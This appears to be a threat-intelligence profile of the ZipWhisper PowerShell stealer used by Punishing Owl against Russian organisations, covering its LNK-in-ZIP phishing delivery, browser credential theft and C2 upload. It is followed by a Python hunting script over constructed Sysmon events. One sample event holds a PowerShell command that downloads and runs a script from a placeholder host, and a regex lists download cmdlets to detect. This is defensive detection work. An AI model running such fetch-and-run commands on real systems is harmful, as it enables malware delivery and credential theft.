ZipWhisper
ZipWhisper is a PowerShell-based stealer used by the hacktivist threat actor Punishing Owl in campaigns targeting Russian organizations, including state institutions, scientific enterprises, IT organizations, government security agencies, and broader critical infrastructure targets. Observed since at least December 2025, it has been delivered via phishing and BEC-style emails containing password-protected ZIP archives with disguised Windows shortcut (LNK) files masquerading as PDF documents. When opened, the LNK executes PowerShell commands that download ZipWhisper from attacker-controlled infrastructure, including a command-and-control server at bloggoversikten[.]com. ZipWhisper harvests sensitive data from infected Windows systems, specifically browser credential files, cookies, and saved passwords. It stages the stolen data in the AppData/Local/Temp directory, packages it into ZIP archives using filenames that include the username and chunk numbers, and uploads the archives back to the attacker-controlled server via a customized endpoint structure. Supporting reporting also states that the malware was used to harvest sensitive data and upload it to the same remote server, and that data stolen in related operations was later leaked by Punishing Owl on the dark web. Analysis of the script identified code comments suggesting possible use of AI tooling to generate parts of the malware.
Groups observed using it
1 distinct threat actor attributed by public researchers.
...download a stealer named ZipWhisper from a remote server to harvest sensitive data and upload it to the same server.
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution: 2 techniques
Stealth: 1 technique
Collection: 1 technique
Command and Control: 1 technique
Recent activity
2 sources tracked across advisories, community write-ups, and news.
Information-stealing malware delivered via phishing (password-protected ZIP containing LNK) that uses PowerShell to download the stealer, harvest sensitive data, and exfiltrate it to the same remote server.
PowerShell-based credential stealer delivered via password-protected ZIP attachments containing disguised LNK files. Executes PowerShell to download the payload, then collects browser credential stores (credentials, cookies, saved passwords), packages the data into ZIP archives (with username/chunk naming), stages them in AppData/Local/Temp, and uploads them to a C2 endpoint on attacker infrastructure.
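As an added hunting example (not code from the page, from Mallory, or from the cited reporting), the detection logic below runs over constructed Sysmon-style process-create and file-create events and flags the two stages described in the family description and in the source summaries above: an Explorer-spawned PowerShell that fetches remote content (the LNK stage), and PowerShell writing ZIP archives under AppData\Local\Temp whose names carry the account name and a chunk number. The event field names, the download-cmdlet list and the '<user>_<n>.zip' filename shape are assumptions, not details the page confirms.

```python
import re

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (not from the page): Sysmon-style process-create (EID 1)
# and file-create (EID 11) events from one workstation, with one benign ZIP for contrast.
SAMPLE_EVENTS = [
    {"eid": 1, "user": "CORP\\ivanov", "parent": r"C:\Windows\explorer.exe", "image": PS_EXE,
     "cmdline": 'powershell.exe -c "iwr https://c2.example.invalid/p -OutFile $env:TEMP\\s.ps1; . $env:TEMP\\s.ps1"'},
    {"eid": 11, "user": "CORP\\ivanov", "image": PS_EXE,
     "path": r"C:\Users\ivanov\AppData\Local\Temp\ivanov_1.zip"},
    {"eid": 11, "user": "CORP\\ivanov", "image": PS_EXE,
     "path": r"C:\Users\ivanov\AppData\Local\Temp\ivanov_2.zip"},
    {"eid": 11, "user": "CORP\\petrov", "image": r"C:\Program Files\7-Zip\7zFM.exe",
     "path": r"C:\Users\petrov\Downloads\report.zip"},
]

# Common PowerShell download primitives; a heuristic, not a claim about the exact loader command.
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)
TEMP_ZIP_RE = re.compile(r"\\appdata\\local\\temp\\([^\\]+)\.zip$", re.I)

def is_lnk_style_download(ev: dict) -> bool:
    """Explorer-spawned PowerShell that fetches remote content: the LNK-to-PowerShell stage."""
    return (ev["eid"] == 1
            and ev.get("parent", "").lower().endswith("explorer.exe")
            and ev["image"].lower().endswith("powershell.exe")
            and DOWNLOAD_RE.search(ev.get("cmdline", "")) is not None)

def is_staged_chunk(ev: dict) -> bool:
    """ZIP written by PowerShell under AppData\\Local\\Temp whose name carries the account
    name and ends in a chunk number. The '<user>_<n>.zip' shape is an assumption."""
    if ev["eid"] != 11 or not ev["image"].lower().endswith("powershell.exe"):
        return False
    account = ev["user"].split("\\")[-1].lower()
    m = TEMP_ZIP_RE.search(ev["path"])
    return m is not None and account in m.group(1).lower() and m.group(1)[-1].isdigit()

def hunt(events: list) -> dict:
    """Correlate per account; return only accounts showing the download stage or staged chunks."""
    findings = {}
    for ev in events:
        f = findings.setdefault(ev["user"], {"download": False, "chunks": []})
        if is_lnk_style_download(ev):
            f["download"] = True
        elif is_staged_chunk(ev):
            f["chunks"].append(ev["path"])
    return {u: f for u, f in findings.items() if f["download"] or f["chunks"]}

if __name__ == "__main__":
    for user, f in hunt(SAMPLE_EVENTS).items():
        print(f"{user}: download_stage={f['download']} staged_chunks={len(f['chunks'])}")
```

An account that shows both stages within a short window is the strongest signal; either stage alone is worth triage but also matches legitimate admin scripting, so tune the cmdlet list and filename pattern to your environment.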